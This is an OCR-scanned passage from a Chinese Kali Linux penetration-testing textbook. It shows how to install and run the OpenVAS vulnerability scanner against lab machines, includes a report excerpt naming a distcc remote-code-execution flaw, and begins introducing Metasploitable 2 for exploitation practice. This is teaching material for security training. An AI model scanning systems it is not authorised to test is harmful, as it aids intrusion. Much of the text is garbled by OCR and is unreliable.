What you are about to enter is what is called a Distinguished Name or a DN. 

There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 

Country Name (2 letter code) [DE]:State or Province Name (full name) [Some-State]:Locality 
Name (eg, city) []:Organization Name (eg, company) [Internet Widgits Pty Ltd]:Organizational Unit 
Name (eg, section) []|: Common Name (eg, your name or your server's hostname) []:Email Address 
[]: Using configuration from /tmp/openvas-mkcert-client. 16 /92/stdC .cnf 

Check that the request matches the signature 

Signature ok 

The Subject's Distinguished Name is as follows 


countryName :PRINTABLE:DE' 
localityName :PRINTABLE: Berlin' 
commonName :PRINTABLE:'om' 


Certificate is to be certified until Apr 25 06:55:05 2015 GMT (365 days) 
Write out database with 1 new entries 

Data Base Updated 

User om added to OpenVAS. 


EJ EA tH Aa eae as SE ae Pa ES Ae, PARU om HJ". 
(4) 重建 数据 库 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvasmd -rebuild 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(5) 启动 OpenVAS 扫描 ， 并 加 载 所 有 插件 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvassd 
Loading the OpenVAS plugins...base gpgme-Message: Setting GnuPG homedir to '/etc/openvas/ 


gnupg 
base gpgme-Message: Using OpenPGP engine version '1.4.12' 
All plugins loaded 


从 输出 的 信息 中 可 以 看 到 所 有 捅 件 已 加 载 。 由 于 加 载 的 插件 比较 多 ， 所 以 执行 该 命令 
的 时 间 会 长 一 点 。 
(6) 重建 并 创建 数据 库 的 备份 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvasmd --rebuild 
root@kali:/usr/share/openvas# openvasmd —backup 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 
CI) 创建 一 个 管理 OpenVAS IH]. SAT aae Ul P rn: 


root@kali:/usr/share/openvas# openvasad -c 'add user' -n openvasadmin -r Admin 

Enter password: 

ad | main: MESSAGE 2732:2014-04-25 15h25.35 CST: No rules file provided, the new user will 
have no restrictions. 

ad | main: MESSAGE:2732:2014-04-25 15h25.35 CST: User openvasadmin has been successfully 
created. 


从 输出 的 信息 中 可 以 看 到 用 户 openvasadmin 被 成 功 创建 。 
(8) 创建 一 个 普通 用 户 。 执 行 命 令 如 下 所 示 ; 
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root@kali:/usr/share/openvas# openvas-adduser 
Using /var/tmp as a temporary file holder. 
Add a new openvassd user 


Login : lyw 9 XRPS 
Authentication (pass/cert) [pass] : pass # 选 择 认 证 方式 
Login password : # 设 置 用 户 密 码 
Login password (again) : # 输 入 确认 密码 
User rules 


openvassd has a rules system which allows you to restrict the hosts that lyw has the right to test. 
For instance, you may want him to be able to scan his own host only. 

Please see the openvas-adduser(8) man page for the rules syntax. 

Enter the rules for this user, and hit ctrl-D once you are done: 


(the user can have an empty rules set) # 按 下 Ctrl+D 
Login : lyw 

Password 7 oe fe oie fe 2 ok 2 oie ie ae 2k 

Rules : 

Is that ok? (y/n) [y] y # 输 入 y， 提 交 数 据 
user added. 


Mi b ES fig SP BA EAS JI - 
(9) 为 OpenVAS 配置 端口 。 执 行 命令 如 下 上 所 示 : 


root@kali:/usr/share/openvas# openvasmd -p 9390 -a 127.0.0.1 
root@kali:/usr/share/openvas# openvasad -a 127.0.0.1 -p 9393 
root@kali:/usr/share/openvas# gsad --http-only --listen=127.0.0.1 -p 9392 


执行 以 上 命令 后 ，OpenVAS Him AS My 9392. 
AEE: 9392 是 推荐 的 一 个 Web 浏览 器 端口 。 用 户 也 可 以 选择 其 他 端口 号 。 
(10) 在 浏览 器 中 输入 http://127.0.0.1:9392/, 打开 OpenVAS 登录 界面 , 如 图 5.28 所 示 。 
Greenbone Security Assistant - Iceweasel —— : 
File Edit View History Bookmarks Tools Help 


| & Greenbone Security Assistant | dp | 
@ 127.0.0.1:9392/login/login.htm. 


v e Riv Google 


Most Visitedv fil Offensive Security W Kali Linux." Kali Docs 


Greenbone Security Assistant 
EAS 
w 


U 
Username [openvasadmin 


Login 


图 5.28 OpenVAS 登录 界面 


* 1355 


ON 在 该 界面 输入 创建 的 用 己 名 和 密码 ， 然 后 单 击 Login 按钮 ， 将 显示 如 图 5.29 所 
下 的 界面 。 


Greenbone Security Assistant ~ Iceweasel "A 


File Edit View History Bookmarks Tools Help 
& Greenbone Security Assistant | oa | 


* @ 127.0.0.1:.9392/omp?cmd- get. tasks&overrides- 1&token-ea957ee8-4c7f-4€ 


wv e 图 ~ Google 


ff Most Visitedv [Offensive Security Ñ Kali Linux '& Kali Docs MMExploit-DB Wà Aircrack-ng 


| ogged in ès A i O [^] 
hax: Greenbone <> Logged in es Admin openvasadmin | Logout 
G® Security Assistant 


Administration 


Tasks (total: 0) @\ 88 p 


MEEN CTS C 


Filter: | apply-overrides-1 first=1 rows=10 sort=name 


Reports 
Name Status Total Trend Actions 
ides-1 first-1 rows-10 sort-name) 


(Applied filter: apply overr 


K] 5.29 OpenVAS 初始 界面 


关于 启动 OpenVAS 介绍 一 些 附 加 信息 。 每 次 运行 OpenVAS 时 , 都 必须 要 做 以 下 工作 : 
O 同步 NVT Feed( 当 新 的 漏洞 被 发 现时 ， 该 记录 将 改变 ) ; 
O 启动 OpenVAS Fata: 

O 备份 数据 库 ; 

O Aca ig A 

为 了 节约 时 间 ， 下 和 面 将 介绍 编写 一 个 人 简单 的 Bash 脚本 ， 方 便 用 户 局 动 OpenVAS。 保 
存 脚本 文件 名 为 OpenVAS.sh， 并 放 该 文件 在 /root 文件 夹 中 。 脚 本 文件 内 容 如 下 所 示 : 

#1!/bin/bash 

openvas-nvt-sync 

openvassd 

openvasmd --rebuild 

openvasmd --backup 

openvasmd -p 9390 -a 127.0.0.1 


openvasad -a 127.0.0.1 -p 9393 
gsad --http-only --listen=127.0.0.1 -p 9392 


编写 好 该 脚本 时 ,以 后 运行 OpenVAS ES 
14 一 一 A— - —— pem Profile 
就 不 用 执行 多 条 命令 了 ， 只 需要 执行 一 下 | 
OpenVAS.sh 脚本 就 可 以 了 。 ee [| 渍 


ser account for your scan 


在 Kali 中 , OpenVAS 也 提供 了 图 形 界 || 77 | 
dis 2 Ya nce eeu Serveraddress Por 
面 。 启 动 OpenVAS 图 形 界面 的 方法 如 下 :| | TM i 
在 Kali 桌面 上 依次 选择 “应 用 程 Betere yas rss login (127.0.0.1 | [9390 a 


FE” [Kali Linux|“ 漏 洞 分 析 ”|OpenVAS| || e| 


must have OMP support : ; 
openvas-gsd 命令 , 将 显示 如 图 530 所 示 的 Weser fere | 


FTA o Password 
在 该 界面 输入 服务 器 的 地 址 se 
127.0.0.1、 用 户 名 和 登录 密码 。 然 后 单 击 Cancel 


Log in 按钮 即 可 登录 到 OpenVAS 服务 器 。 [d 5.30 OpenVAS 图 形 登 录 界 面 


Save | Delete | 


ui LR. 
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5.22 创建 Scan Config 和 扫描 任务 


IW Fee OpenVAS 驳 配 置 好 了 ， 现 在 使 用 浏览 右 的 方式 登录 服务 右 。 在 该 服务 
A PITE Scan Config、 创 建 扫 描 目 标 及 新 建 扫描 任务 才 可 以 进行 各 种 漏洞 扫描 。 设 置 好 这 
些 信息 用 户 束 可 以 进行 各 种 漏洞 扫描 了 ， 如 本 地 漏洞 扫描 、 网 络 漏洞 
扫描 和 指定 操作 系统 漏洞 扫描 等 。 进 行 这 些 漏洞 扫描 之 前 ， 都 必须 要 


Configuration 


Targets 


创建 Scan Config 和 扫描 任务 等 。 这 里 将 分 别 介 绍 这 些 配 置 , 方便 后 面 oe 
的 使 用 o Credentials 


Scan Configs $ 


Alerts 


1. 新 建 Scan Config Filters 


Schedules 


新 建 Scan Config 的 具体 操作 步骤 如 下 所 示 。 = 
C1) ERZAR IKIXXCTE Configuration|Scan Configs fit Agents 


的 界面 。 


Scan Configs 1 - 5 of 5 (total: 5) "EE UN (VNo auto-refresh |© ER 
Filter: |rowsz10 first=1 sort=name aw 


Families NVTs 
Name 


(Empty and static configuration template.) 
Cd 
5 
kal 
a 


Full and fast 
(Most NVT's; optimized by using previously collected information.) 


51 34694 E] -1 
Full and fast ultimate 
(Most NVT's including those that can stop services/hosts; optimized by using previously collected information.) 


314694 A CALDO 


Full and very deep 
(Most NVT's; don't trust previously collected information; slow.) 


34694 ape ets 


Full and very deep ultimate 
(Most NVT's including those that can stop services/hosts; don't trust previously collected information; slow.) 


34694 FF IE S EÓ 


图 5.32 Scan Configs 界面 


(2) 从 该 界面 可 以 看 到 默认 总 共有 5 个 Scan Config, 在 该 界面 单 击 国 (New Scan Config) 
图 标 ， 将 显示 如 图 5.33 所 示 的 界面 。 


jo S A 7 | Ogo E 
PN Greenbone <> Logged in as Admin openvasadmin | Logout 


v Security Assistant SA har oe GRETAS S012 Df 


Scan Management Asset Management Secinfo Management Configuration Extras Administration 


New Scan Config 78 


Name |Local Vulnerabilities 
Comment (optional) | 


(e) Empty, static and fast 
© Full and fast 


Base 


Create Scan Config 


图 5.33 New Scan Config 


di EE 
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(3 和 洼 :该 界面 设置 扫 摘 的 名 称 , 这 里 设置 为 Local Vulnerabilities. X} F Base 选择 Empty; 
Static and fast 复 选 框 ， 该 选项 允许 用 户 从 零 开 始 并 创建 日 己 的 配置 。 然 后 单 击 Create Scan 
Config 按钮 ， 将 会 看 到 新 建 的 配置 ， 如 图 5.34 所 示 。 


Families NVTs 
Actions 


Local Vulnerabilities 0 Bd 0 bd Hagg 


图 5.34 新 建 的 Local Vulnerabilities 


(4) 从 该 界面 可 以 看 到 新 建 的 Local Vulnerabilities, 要 编辑 该 配置 可 以 单 击 罗 (Edit Scan 
Config) 图 标 。 创建 好 Scan Config 后 需 选 择 扫 摘 的 内 容 。 此 时 单 击 图 图 标 选 择 扫描 的 内 容 ， 
如 图 5.35 所 示 。 


Edit Scan Config AS A ae 


Name Local Vulnerabilities | 
Comment (optional) [| | 


| Save Config | 
Edit Network Vulnerability Test Families 


Compliance 0 of 4 e] ^ EO]- | 

Databases 0 of 115 ogon " 
Debian Local Security Checks 0 of 2899 ODO [] 
Default Accounts 0 of 68 Od og 
Denial of Service 0 of 877 e] ^ @ GJ iv) 
FTP 0 of 168 ogon 
Total: 0 0 of 0 Bd 


| Save Config | 
图 5.35 选择 扫描 内 容 


C5) 从 该 界面 的 Family 栏 看 到 有 很 多 的 可 扫描 信息 ， 此 时 将 Select all NVT's 栏 中 的 复 
选 框 勾 选 上 即 可 ， 设 置 完 后 ， 单 击 Save Config 按钮 。 图 5.35 是 经 过 修改 后 的 一 个 图 ， 该 
界面 显示 的 内 容 较 多 ， 由 于 篇 幅 的 原因 ， 这 里 只 截取 了 一 部 分 。 


2. 新 建 目标 


在 服务 占 的 沫 单 栏 中 依次 选择 Configuration|Targets 命令 ， 将 显示 如 图 5.36 所 示 的 
界面 。 


p^ Greenbone 9 Ie» Logged in as Admin openvasadmin | Logout 


ID Security Assistant ry 


Scan Management Asset Management Secinfo Management Configuration Extras Administration 


Targets 1-1 of 1 (total: 1) 11 p 


Filter: rows=10 first=1 sort=name 10 first=1 sort=name gg | 四 E le El Bj 
= = | 


Localhost localhost 1 OpenVAS Default wit 


15.36 Targets 界面 


53395 
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在 该 界面 单 击 回 (New Target) 图 标 ， 将 显示 如 图 5.37 所 示 的 界面 。 


New Target 7€ 


Local Vulnerabilities 


"T 
O From file | Browse... | No file selected. 


Comment (optional) | 


Port List ALL IANA assigned TCP 2012-02-10 


SSH Credential (optional) 


SMB Credential (optional) 


Create Target | 


图 5.37 新建 Target 界面 


在 该 界面 输入 Target 名 称 及 扫 朱 的 主机 。 然 后 单 击 Create Target 按钮 ,将 显示 如 图 5.38 
所 示 的 界面 。 


Local Vulnerabilities localhost 1 AIIIANAassigned TCP 2012-02-10 HaT 


Localhost localhost 1  OpenVAS Default ERD 
图 5.38 新 建 的 目标 
从 该 界面 可 以 看 到 新 建 的 Local Vulnerabilities 目标 。 
3. 新 建 任 务 


在 OpenVAS 的 菜单 栏 中 依次 选择 Scan Management|New Task 命令 ， 将 显示 如 图 5.39 
所 示 的 界面 。 


New Task 7 \& 


Name [Local Vulnerabilities | 


Scan Config 


^ 


| Local Vulnerabilities le | 


Scan Targets Local Vulnerabilities © 
Alerts (optional) -- $ | B 


Schedule (optional) --|¥ | 
NEN pun 
Slave (optional) lr le | 
Add results to Asset 
Management @ yes O no 


Scan Intensity 


Maximum concurrently executed NVTs per host 


Maximum concurrently scanned hosts 


| Create Task 
图 5.39 新建 任务 
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在 该 界面 设置 任务 名 称 、Scan Config 和 Scan Targets， 然 后 单 击 Create Task 按钮 ， 将 
显示 如 图 5.40 所 示 的 界面 。 


Tasks 1-10f1 (tota: ) 8 4 NS. 9 Eee © 


Filter: lapply- overrides=1 first=1 rows=10 sort=name ta [ | * Bull: B 目 


Status Total Trend Actions 


Local Vulnerabilities Lalla Han 


图 $5.40 ”新 建 的 任务 


在 该 界面 单 击 回 〈Start) 图 标 ， 将 开始 漏洞 扫描 。 当 局 动 该 扫 拉 任务 后 ， 按 钮 将 变 为 四 
(Pause) ， 单 击 该 按钮 可 以 暂停 扫 摘 ， 也 可 以 单 击 口 (Stop) 停止 扫描 。 


5.2.3 扫描 本 地 漏洞 


OpenVAS 人 允许 用 户 大 沁 围 扫 换 漏洞 , 并 且 将 限制 在 用 户 的 评估 列表 中 ,目标 主机 的 汤 
洞 指 定 是 从 评估 中 获得 的 信息 。 本 小 节 将 介绍 使 用 OpenVAS RAF FRE ASHE H bn ZR 
统 上 的 漏洞 。 扫 摘 本 地 漏洞 的 具体 操作 步骤 如 下 所 示 。 

(1) 新 建 名 为 Local Vulnerabilities 的 Scan Config. 

(2) 添加 扫 摘 的 类 型 ， 所 需 扫 描 类 型 如 表 5-4 rpm. 


表 5-4 扫描 的 类 型 


Compliance 扫描 Compliance 漏洞 

Default Accounts 扫描 默认 账 号 漏洞 

Denial of Service 扫描 拒 绝 服务 漏洞 

FTP 1416 FTP HRI Ari il] 

Ubuntu Local Security Checks 扫描 Ubuntu 系统 的 本 地 安全 漏洞 


(3) 创建 目标 系统 。 
(4) 创建 名 为 Local Vulnerabilities 扫描 任务 。 
C5) 扫描 完 本 地 漏洞 的 显示 界面 如 图 5.41 所 示 。 


Tasks 1-10of1(total: 1) @ 5S 图 TCR © 


ai | MEN first=1 rows=10 sort=name [| | Li | Ape B B 


Status Total Trend Actions 


Local Vulnerabilities Apr 25 2014 " None | GODOEEEAd RE 


图 5.41 扫 摘 漏洞 完成 


(6) 在 该 界面 单 击 国 (Task Details) 图 标 ， 查 看 漏洞 扫描 的 详细 信息 。 显 示 界 面 如 图 
5.42 TAN. 

CI) FMA AN SP BO, AP EES TEN A AS a ed Fa Ra a. FP 
报告 信息 中 可 以 了 解 本 地 系统 是 否 有 漏洞 。 在 该 界面 单 击 Actions 栏 下 的 国 (Details) 图 
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pH 以 碍 看 详细 情况 。 单 击 该 图 标 后 ， 将 显示 如 图 5.43 所 示 的 界面 。 


Task Details ?%=: mm AAi) 


Name: Local Vulnerabilities ID: ab1e5a09-a029-4881-827c-fe525ead7dd9 
Created: Sat Apr 26 04:02:54 2014 
Last Modified: Sat Apr 26 04:05:51 2014 


Comment: 

Scan Config: Local Vulnerabilities 
Alerts: 

Schedule: (Next due: over) 
Target: Local Vulnerabilities 


Slave: 

Status: — si ened 
Reports: 1 (Finished: 1) 
Observers: 

Add to Assets: yes 

Notes: 0 

Overrides: 0 


Scan Intensity 
Maximum concurrently executed NVTs per host: 4 


Maximum concurrently scanned hosts: 20 


Reports for "Local Vulnerabilities" ? | VApply overrides C | v | VApply overrides © Mss 


Scan Results , 
E uet 一 一 一 一 一 一 一 一 一 一 一 


Sat Apr 26 04:05:48 2014 


Done 9 0 


图 5.42 扫描 的 详细 信息 


Report summary A ED © 


Result of Task: Local Vulnerabilities 
Order of results: by host 

Scan started: Sat Apr 26 07:25:19 2014 
Scan ended: Sat Apr 26 07:25:24 2014 
Scan status: ————— 


mE — R8. ——8..—RN 9B B9 — tm 


Full report: B > [Por |S ait 


All filtered results: 


Filtered results: 


图 5.43 报告 摘要 


(8) 在 该 界面 显示 了 所 有 信息 ， 这 些 信 息 可 以 通过 单 击 划 (Download) 图 标 下 载 扫 搬 
报告 。 


9.2.4 $218 Dd 2 7r 2] 


本 小 市 将 介绍 使 用 OpenVAS 扫 摘 一 个 网 络 漏洞 。 这 些 漏洞 的 信息 是 指 一 个 目标 网 络 
中 某 个 设备 的 信息 。 本 小 节 中 将 Windows XP, Windows 7, Metasploitable 2.0 和 Linux 系 
统 作为 目标 测试 系统 。 扫 描 网 络 漏洞 的 具体 操作 步骤 如 下 所 示 。 

(1) 新 建 名 为 Network Vulnerability 的 Scan Config。 

(2) 添加 所 需 扫 描 的 类 型 ， 如 表 5-5 所 示 。 


.142 。 


第 S$ 章 ”漏洞 扫描 


表 5-5 扫描 类 型 


Brute force attacks 暴力 攻击 

Buffer overflow HAH Be FF tint HA i d] 
CISCO 扫描 CISCO it FA as 
Compliance 1116 Compliance 漏洞 
Databases HAH 2c n PE i hd 
Default Accounts HHU SERE 
Denial of Service fA FHI 26 RS Ji hn] 
FTP 扫描 FTP 服务 器 漏洞 
Finger abuses 扫描 Finger Whi HH devel 
Firewalls 扫描 防火 墙 漏洞 

Gain a shell remotelly 扫描 获取 远程 Shell 的 漏洞 
General 扫描 漏洞 

Malware 扫描 恶意 软件 
Netware 扫 摘 网 络 操作 系统 
NMAP NSE 扫描 NMAP NSE 漏洞 
Peer-To-Peer File Sharing 扫描 共享 文件 漏洞 
Port Scanners FAHA 9m L1 dis dd] 
Privilege Escalation 扫 拉 提升 特权 漏洞 
Product Detection 扫描 产品 侦察 

RPC 扫描 RPC 漏洞 
Remote File Access Tie Fe SC TF VI In] d hs] 
SMTP Problems 扫描 SMTP 问题 
SNMP 扫描 SNMP 漏洞 
Service detection 扫描 服务 侦察 

Settings 扫描 基本 设置 漏洞 


(3) 创建 名 为 Network Vulnerability 目标 系统 。 
(4) 创建 名 为 Network Scan 扫描 任务 。 
(50 AHHAR, WB 5.44 所 示 。 


Tasks 1-7of7(tota:7)@\8= E Ces S 
ie first=1 rows=10 sort=name [| < J -- ° JB B 


Reports 
Status Total Trend Actions 


Network Scan Apr 28 2014 > 回 圆 四 回回 
Windows Scan —pn— 1 Apr 26 2014 | Medium | » 回 圆 四 回国 


(Applied filter: apply overrides=1 first-1 rows=10 sort-name) 


图 5.44 Network 扫描 结果 


(6) 从 该 界面 可 以 看 到 整个 网 络 中 漏洞 的 情况 不 大 严重 ， 漏 洞 状态 为 Medium. AA 
详细 漏洞 扫描 情况 的 方法 在 前 面 已 经 介绍 ， 这 里 就 不 再 疆 述 。 


5.2.5 扫描 指定 Linux 系统 漏洞 


本 小 节 将 介绍 使 用 OpenVAS 扫描 指定 Linux 系统 的 漏洞 。 这 些 漏洞 信息 来 自在 一 个 
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目标 网 络 中 指定 的 Linux 系统 。 推 荐 使 用 的 目标 Linux 系统 为 Metasploitable 2.0 FH 
何 版 本 Linux。 扫 摘 指 定 Linux 系统 漏洞 的 具 
(1) 新 建 名 为 Linux Vulnerabilities 的 Scan Config. 


(2) 添加 所 需 的 扫 摘 类 型 ， 如 表 5-6 所 示 。 


Brute force attacks 
Buffer overflow 
Compliance 
Databases 

Default Accounts 
Denial of Service 
FTP 

Finger abuses 

Gain a shell remotely 
General 

Malware 

Netware 

NMAP NSE 

Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Porblems 
SNMP 

Service detection 
Settings 

Web Servers 


表 5-6 扫描 的 类 型 


(3) 创建 Linux Vulnerabilities 目标 系统 。 
(4) 创建 Linux Scan 扫描 任务 。 


(5) 扫描 


311 胃 


Tasks 1 - 7 of 7 (total: 7) ? 


结果 ， 如 图 5.45 所 示 。 


信息 的 收集 及 利用 


LA. AT 


体操 作 步 又 如 下 所 示 。 


暴力 攻击 

扫 摘 绥 存 溢出 漏洞 
扫描 Compliance 漏洞 
扫 摘 数据 库 漏洞 

扫描 默认 用 户 账 号 漏洞 
扫描 拒绝 服务 的 漏洞 
扫描 FTP 服务 器 漏洞 
扫描 Finger 小 用 漏洞 
扫描 获取 远程 Shell 漏洞 
扫描 General 漏洞 
FATE SE d dd 
扫描 网 络 操作 系统 
扫 朱 NMAP NSE 漏洞 
扫 摘 站 口 漏洞 

扫 摘 提升 特权 漏洞 
扫描 产品 侦察 漏洞 
扫描 RPC 漏洞 

扫描 远程 文件 访问 漏洞 
扫描 SMTP 问题 

扫描 SNMP 漏洞 

扫描 服务 侦察 漏洞 
扫描 基本 设置 漏洞 
扫描 Web 服务 漏洞 


CITED ° 


Filter: |apply_overrides=1 first=1 rows=10 sort=name 


a eee 


Linux 


(6) 从 该 界面 可 以 看 到 目标 系统 中 有 非常 严重 的 漏洞 。 


Apr 28 2014 


图 5.45 


标 ， 碍 看 漏洞 扫 摘 的 详细 信息 ， 如 图 5.46 所 示 。 
(7) 从 该 界面 的 扫描 报告 中 可 以 看 到 有 14 个 非常 严重 的 漏洞 信息 。 在 该 界面 的 Actions 
中 单 击 国 (Details) 图标 查看 具体 漏洞 情况 ， 如 图 5.47 所 示 。 


° 144° 


Linux 扫描 结果 


Reports 
Trend Actions 


OBO 


此 时 单 击 贺 (Task Details) 图 
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Task Details TWE ove PPE 


ID: 0310b89d-aa1 a-4fbb-90ea-edd3 1eBd1c06 
Created: Mon Apr 28 07:08:45 2014 
Last Modified: Mon Apr 28 07:09:06 2014 


Name: Linux 

Comment: 

Scan Config: Linux Vulnerabilities 
Alerts: 

Schedule: (Next due: over) 
Target: Linux 

Slave: 

Status: (ene 
Reports: 1 (Finished: 1) 
Observers: 

Add to Assets: yes 

Notes: 0 

Overrides: 0 


Scan Intensity 
Maximum concurrently executed NVTs per host: 4 
Maximum concurrently scanned hosts: 20 


Reports for "Linux " ? | VApply overrides © | 2 


Scan Results 


Mon Apr 28 07:08:49 2014 7 5 120 o BEES 


图 5.46 Task Details 


Security Issues reported for 192.168.41.142 


High (CVSS: 9.3) distcc (3632/ 
NVT: distcc Remote Code Execution Vulnerability (OID: 1.3.6.1.4.1.2 
* 53 
Summary: 
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict 
access to the server port, allows remote attackers to execute arbitrary 
commands via compilation jobs, which are executed by the server without 
authorization checks. 
Solution: 
Vendor updates are available. Please see the references for more 
information. 


References 


CVE: CVE-2004-2687 

CERT: Warning: database not available 

Other: http://distcc.samba.org/security.htm| 
http://web.nvd.nist.gov/view/vuln/detail?vulnid=CVE-2004-2687 
http://www.osvdb.org/13378 
http://archives.neohapsis.com/archives/bugtraq/2005-03/0183.html 


ud CVSS: 10.0) ingreslock (1524/tcp) 
: Possible Backdoor: Ingreslock (OID: 1.3.6.1.4.1.25623.1.0.103549) 


图 5.47 漏洞 消息 


(8) 该 界面 显示 的 信息 很 多 ， 由 于 篇 幅 的 原因 ， 这 里 只 截取 了 其 中 一 个 较 严 重 的 漏洞 。 
从 该 界面 可 以 看 到 192.168.41.142 ws 漏洞 信息 包括 目标 主 
LATIF ACH Sig A. OID 和 解决 方法 等 。 关 于 漏洞 的 报告 可 以 使 用 前 面 介绍 过 的 方法 进行 下 载 。 


5.2.6 扫描 指定 Windows 系统 漏洞 


本 小 节 将 介绍 使 用 OpenVAS 扫描 指定 Windows 系统 漏洞 。 这 些 漏 洞 信息 来 自在 一 个 
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目标 网 络 内 指定 的 Windows 目标 系统 。 这 里 推荐 的 目标 系统 为 Windows XP 和 Windows 7. 


使 用 OpenVAS 扫描 指定 Windows 系统 漏洞 的 具体 操作 步骤 如 下 所 示 。 


信息 的 收集 及 利用 


(1) 新 建 名 为 Windows Vulnerabilities 的 Scan Config。 
(2) 添加 所 需 的 扫 摘 类 型 ， 


(3) 创建 名 为 Windows Vulnerabilities 目标 系统 。 


如 表 5-7 所 示 。 


表 5-7 扫描 的 类 型 


Brute force attacks 暴力 攻击 

Buffer overflow ft Be FF 8 HA dii] 
Compliance 扫描 Compliance 漏洞 
Databases 扫 拉 数据库 漏 洞 
Default Accounts 扫描 默认 用 户 账号 漏洞 
Denial of Service 扫描 拒绝 服务 漏洞 

FTP Hfi FTP 服务 器 汤 泣 
Gain a shell remotely 扫描 获取 远程 Shell 的 漏洞 
General 扫描 General 漏洞 
Malware 扫描 网 络 操 作 系 统 漏洞 
NMAP NSE 扫描 NMAP NSE jii] 
Port Scanners FAF Yaa L1 RS Vl 

Privilege Escalation 扫 朱 提升 特权 漏洞 
Product Detection 扫描 产品 侦察 漏洞 
RPC 扫描 RPC 漏洞 

Remote File Access 扫描 远程 文件 访问 漏洞 
SMTP Problems 扫描 SMTP 问题 漏洞 
SNMP 扫描 SNMP 漏洞 
Service detection 扫描 服务 侦察 漏洞 
Web Servers 扫描 Web 服务 漏洞 


Windows 


Windows:Microsoft Bulletins 


(4) 创建 名 为 Windows Scan 扫描 任务 。 
(5) 扫 摘 完成 后 ， 结 打 如 图 5.48 所 示 。 


Tm Cr S 


Filter: |apply_overrides=O rows=10 first=1 sort=name 


Tasks 1 - 4 of 4 (total: 4) $ INL S 


+ 


Hti Windows 系统 漏洞 
扫描 Windows 系统 微软 公 ， 


Reports 


告 漏洞 


m m IE ER 


Local Vulnerabilities 2 Apr262014 = Apr 26 2014 | None | Gd Ld 回 圆 四 回回 
Windows Scan —"ÀÓ— !— 1 Apr 26 2014 | | Ld EJESEAC EU 


图 5.48 扫描 结果 


(6) 从 该 界面 可 以 看 到 Windows Scan 扫描 已 完成 ， 漏 洞 情况 为 Medium。 可 以 在 该 界 
面 单 击 国 (Task Details) 图 标 查 看 详细 信息 ， 如 图 5.49 所 示 。 

CI). 从 该 界面 可 以 了 解 扫 描 任务 的 设置 及 扫描 报告 信息 ， 如 扫 摘 完成 的 时 间 、 漏 洞 情 
况 及 日 六。 如 果 想 租 看 更 详细 的 报告 ， 使 用 前 面 介 绍 过 的 方法 下 载 扫 摘 报告 。 
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Task Details UMS WD 


Name: Windows Scan ID: €d33c9b3-81b2-4228-9498-1a9c5262fb96 
Created: Sat Apr 26 06:41:27 2014 
Last Modified: Sat Apr 26 06:41:52 2014 


Comment: 

Scan Config: Windows vulnerabilities 
Alerts: 

Schedule: (Next due: over) 

Target: Windows vulnerabilities 
Slave: 

Status: ——— 
Reports: 1 (Finished: 1) 
Observers: 

Add to Assets: yes 

Notes; 0 

Overrides: 


Scan Intensity 
Maximum concurrently executed NVTs per host: 4 
Maximum concurrently scanned hosts: 20 


Reports for "Windows Scan" VNo overrides | 2 | overrides 


Scan Results 
Report Threat Actions 


Sat pr 26 06:41:46 2014 | 3 6 54 o BEE 


图 549 Task Details 
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漏洞 利用 是 获得 系统 控制 权限 的 重要 途径 。 用 户 从 目标 系统 中 找到 容易 攻击 的 漏洞 ， 
然后 利用 该 漏洞 获取 权限 ， 从 而 实现 对 目标 系统 的 控制 。 为 了 便于 用 户 练习 ， 本 章 将 介绍 
Metasploit 发 布 的 Metasploitable 2。 用 户 可 以 将 其 作为 练习 用 的 Linux 操作 系统 。 本 章 将 利 
用 Metasploitable 系统 上 存在 的 漏洞 ， 介 绍 各 种 渗透 攻击 ， 如 MySQL 数据 库 、PostgreSQL 
数据 库 及 Tomcat 服务 等 ， 其 主要 知识 点 如 下 : 

口 Metasploitable 操作 系统 ; 

口 Metasploit 基础 ; 

口 控制 Meterpreter; 

口 渗透 攻击 应 用 ; 

口 fJ Payload 生成 工具 Veil. 


6.1 Metasploitable 操作 系统 


Metasploitable 是 一 球 基 于 Ubuntu Linux 的 操作 系统 。 该 系统 是 一 个 虚拟 机 文件 ， 从 
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/]o] yi: F 2X; fife Hs Z Ja By EA EE 
接 使 用 ， 无 需 安装 。 由 于 基于 Ubuntu， 上 所 以 Metasploitable 使 用 起 来 十 分 得 心 应 手 。 
Metasploitable 就 是 用 来 作为 攻击 用 的 园 机 ， 所 以 它 存在 大 量 未 打 补 本 漏洞， 并 且 开 放 了 无 
Araun. ANTT EB Metasploitable 虚拟 机 的 使 用 。 

安装 Metasploitable 2 的 具体 操作 步骤 如 下 所 示 。 

(1) 下 载 Metasploitables 2， 其 文件 名 为 Metasploitable-Linux-2.0.0.zip. 

(2) 将 下 载 的 文件 解压 到 本 地 磁盘 。 

(3) 打开 VMwareWorkstation， 并 依次 选择 “文件 ”| “打开 ”命令 ， 将 显示 如 图 6.1 
所 示 的 界面 。 


^ £m " ERER 


D Metasploiteble.vmdk.ck 2014/4/28 10:54 xx 
D Metasploitsble.vmx ck 2014/4/28 9:08 
| Metasploitable-b8178ac9.vmemick 2014/4/28 10:54 veii 


> 


[E] Metasploitable.vrnx 2014/4/28 10:54 


eS CD as (H) |- 
ca BHR (I) 


G3 share 192.16 


L3 


IRIN): -| 


me] 


图 6.1 选择 Metasploitable 2 启动 


第 6 章 漏洞 利用 


(4 六 在 该 界面 选择 Metasploitable.vmx， 然 后 单 击 “ 打 开 ” 按 钮 ， 将 显示 如 图 6.2 Aras 
的 界面。 


ij Metasploitable2-Linux - VMware Workstation 
文件 中 SSE) SEV) 虚拟 机 (M) BRET) 帮助 (H) 
P-idcliuotcsdimB k X «| 


[ran 1.06 x || Gi Kai 10.5 x | Éi WordPress x | ip ARS x | 1 Metasploitable2-Linux X 


4i nini dii Linux 


v 设备 
mu 内存 
aes 
GE mRiscsn 
©) CD/DVD (IDE) 
LITE Vl 
Ta pman 2 
Suse ssim 
[ Ez. 


v jh 
Ths is Metasploiteble2 (Linux) = 诬 拟 机 详细 信息 
à 3 " š 状态 : DX 
M ble is t I è : : 
RO ee dignita M 配置 文件 : [:\Metasploitable2-Linux\Metasploitabla.vmx 
vulnerable Linux virtual machne. This 硬件 兼容 性 : Workstation 6.5-7.x 虞 拟 机 
